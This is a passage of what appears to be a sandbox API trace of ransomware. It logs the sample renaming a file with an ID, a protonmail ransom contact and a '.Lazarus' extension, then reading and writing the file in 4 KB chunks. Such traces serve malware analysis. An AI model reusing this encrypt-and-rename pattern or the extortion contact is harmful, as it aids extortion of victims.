dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.515] GetFileType (hFile=0x418) returned 0x1 [0071.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.515] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0071.515] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0071.516] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0071.516] CloseHandle (hObject=0x418) returned 1 [0071.516] AreFileApisANSI () returned 1 [0071.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0071.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 45 [0071.516] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.516] GetFileType (hFile=0x418) returned 0x1 [0071.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0071.516] CloseHandle (hObject=0x418) returned 1 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0071.517] AreFileApisANSI () returned 1 [0071.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0071.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 45 [0071.517] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12)) returned 1 [0071.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.518] AreFileApisANSI () returned 1 [0071.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0071.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.518] GetLastError () returned 0x0 [0071.518] SetLastError (dwErrCode=0x0) [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8a210 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0071.518] GetLastError () returned 0x0 [0071.518] SetLastError (dwErrCode=0x0) [0071.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71a30 [0071.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0071.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0071.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0071.518] AreFileApisANSI () returned 1 [0071.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0071.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x80a30 [0071.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0071.519] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.519] GetFileType (hFile=0x418) returned 0x1 [0071.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0071.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0071.519] AreFileApisANSI () returned 1 [0071.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0071.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 45 [0071.519] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.519] GetFileType (hFile=0x410) returned 0x1 [0071.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0071.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.520] GetLastError () returned 0x0 [0071.520] SetLastError (dwErrCode=0x0) [0071.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.520] GetLastError () returned 0x0 [0071.520] SetLastError (dwErrCode=0x0) [0071.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0071.520] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0071.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0071.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0071.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0071.528] GetLastError () returned 0x0 [0071.528] SetLastError (dwErrCode=0x0) [0071.528] GetLastError () returned 0x0 [0071.528] SetLastError (dwErrCode=0x0) [0071.529] GetLastError () returned 0x0 [0071.529] SetLastError (dwErrCode=0x0) [0071.529] GetLastError () returned 0x0 [0071.529] SetLastError (dwErrCode=0x0) [0071.529] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.529] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.530] GetLastError () returned 0x0 [0071.530] SetLastError (dwErrCode=0x0) [0071.530] GetLastError () returned 0x0 [0071.530] SetLastError (dwErrCode=0x0) [0071.531] GetLastError () returned 0x0 [0071.531] SetLastError (dwErrCode=0x0) [0071.531] GetLastError () returned 0x0 [0071.531] SetLastError (dwErrCode=0x0) [0071.531] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.531] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.531] GetLastError () returned 0x0 [0071.531] SetLastError (dwErrCode=0x0) [0071.531] GetLastError () returned 0x0 [0071.531] SetLastError (dwErrCode=0x0) [0071.531] GetLastError () returned 0x0 [0071.532] SetLastError (dwErrCode=0x0) [0071.532] GetLastError () returned 0x0 [0071.532] SetLastError (dwErrCode=0x0) [0071.532] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.532] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.532] GetLastError () returned 0x0 [0071.532] SetLastError (dwErrCode=0x0) [0071.532] GetLastError () returned 0x0 [0071.532] SetLastError (dwErrCode=0x0) [0071.532] GetLastError () returned 0x0 [0071.532] SetLastError (dwErrCode=0x0) [0071.533] GetLastError () returned 0x0 [0071.533] SetLastError (dwErrCode=0x0) [0071.533] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.533] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.533] GetLastError () returned 0x0 [0071.533] SetLastError (dwErrCode=0x0) [0071.533] GetLastError () returned 0x0 [0071.533] SetLastError (dwErrCode=0x0) [0071.533] GetLastError () returned 0x0 [0071.533] SetLastError (dwErrCode=0x0) [0071.533] GetLastError () returned 0x0 [0071.533] SetLastError (dwErrCode=0x0) [0071.534] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.534] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.534] GetLastError () returned 0x0 [0071.534] SetLastError (dwErrCode=0x0) [0071.534] GetLastError () returned 0x0 [0071.534] SetLastError (dwErrCode=0x0) [0071.534] GetLastError () returned 0x0 [0071.534] SetLastError (dwErrCode=0x0) [0071.534] GetLastError () returned 0x0 [0071.534] SetLastError (dwErrCode=0x0) [0071.534] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.535] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.535] GetLastError () returned 0x0 [0071.535] SetLastError (dwErrCode=0x0) [0071.535] GetLastError () returned 0x0 [0071.535] SetLastError (dwErrCode=0x0) [0071.535] GetLastError () returned 0x0 [0071.535] SetLastError (dwErrCode=0x0) [0071.535] GetLastError () returned 0x0 [0071.535] SetLastError (dwErrCode=0x0) [0071.535] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.535] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.536] GetLastError () returned 0x0 [0071.536] SetLastError (dwErrCode=0x0) [0071.536] GetLastError () returned 0x0 [0071.536] SetLastError (dwErrCode=0x0) [0071.536] GetLastError () returned 0x0 [0071.536] SetLastError (dwErrCode=0x0) [0071.536] GetLastError () returned 0x0 [0071.536] SetLastError (dwErrCode=0x0) [0071.536] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.536] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.536] GetLastError () returned 0x0 [0071.536] SetLastError (dwErrCode=0x0) [0071.537] GetLastError () returned 0x0 [0071.537] SetLastError (dwErrCode=0x0) [0071.537] GetLastError () returned 0x0 [0071.537] SetLastError (dwErrCode=0x0) [0071.537] GetLastError () returned 0x0 [0071.537] SetLastError (dwErrCode=0x0) [0071.537] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.537] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.537] GetLastError () returned 0x0 [0071.537] SetLastError (dwErrCode=0x0) [0071.537] GetLastError () returned 0x0 [0071.538] SetLastError (dwErrCode=0x0) [0071.538] GetLastError () returned 0x0 [0071.538] SetLastError (dwErrCode=0x0) [0071.538] GetLastError () returned 0x0 [0071.538] SetLastError (dwErrCode=0x0) [0071.538] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.538] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.538] GetLastError () returned 0x0 [0071.538] SetLastError (dwErrCode=0x0) [0071.538] GetLastError () returned 0x0 [0071.538] SetLastError (dwErrCode=0x0) [0071.538] GetLastError () returned 0x0 [0071.538] SetLastError (dwErrCode=0x0) [0071.539] GetLastError () returned 0x0 [0071.539] SetLastError (dwErrCode=0x0) [0071.539] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.539] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.539] GetLastError () returned 0x0 [0071.539] SetLastError (dwErrCode=0x0) [0071.539] GetLastError () returned 0x0 [0071.539] SetLastError (dwErrCode=0x0) [0071.539] GetLastError () returned 0x0 [0071.539] SetLastError (dwErrCode=0x0) [0071.539] GetLastError () returned 0x0 [0071.539] SetLastError (dwErrCode=0x0) [0071.540] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.540] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.540] GetLastError () returned 0x0 [0071.540] SetLastError (dwErrCode=0x0) [0071.540] GetLastError () returned 0x0 [0071.540] SetLastError (dwErrCode=0x0) [0071.541] GetLastError () returned 0x0 [0071.541] SetLastError (dwErrCode=0x0) [0071.541] GetLastError () returned 0x0 [0071.541] SetLastError (dwErrCode=0x0) [0071.541] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.541] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.541] GetLastError () returned 0x0 [0071.541] SetLastError (dwErrCode=0x0) [0071.541] GetLastError () returned 0x0 [0071.541] SetLastError (dwErrCode=0x0) [0071.541] GetLastError () returned 0x0 [0071.541] SetLastError (dwErrCode=0x0) [0071.542] GetLastError () returned 0x0 [0071.542] SetLastError (dwErrCode=0x0) [0071.542] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.542] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.542] GetLastError () returned 0x0 [0071.542] SetLastError (dwErrCode=0x0) [0071.542] GetLastError () returned 0x0 [0071.542] SetLastError (dwErrCode=0x0) [0071.542] GetLastError () returned 0x0 [0071.542] SetLastError (dwErrCode=0x0) [0071.542] GetLastError () returned 0x0 [0071.542] SetLastError (dwErrCode=0x0) [0071.543] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.543] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.543] GetLastError () returned 0x0 [0071.543] SetLastError (dwErrCode=0x0) [0071.543] GetLastError () returned 0x0 [0071.543] SetLastError (dwErrCode=0x0) [0071.543] GetLastError () returned 0x0 [0071.543] SetLastError (dwErrCode=0x0) [0071.543] GetLastError () returned 0x0 [0071.543] SetLastError (dwErrCode=0x0) [0071.543] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.544] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.544] GetLastError () returned 0x0 [0071.544] SetLastError (dwErrCode=0x0) [0071.544] GetLastError () returned 0x0 [0071.544] SetLastError (dwErrCode=0x0) [0071.544] GetLastError () returned 0x0 [0071.544] SetLastError (dwErrCode=0x0) [0071.544] GetLastError () returned 0x0 [0071.544] SetLastError (dwErrCode=0x0) [0071.544] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.544] WriteFile (in: hFile=0x418, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, 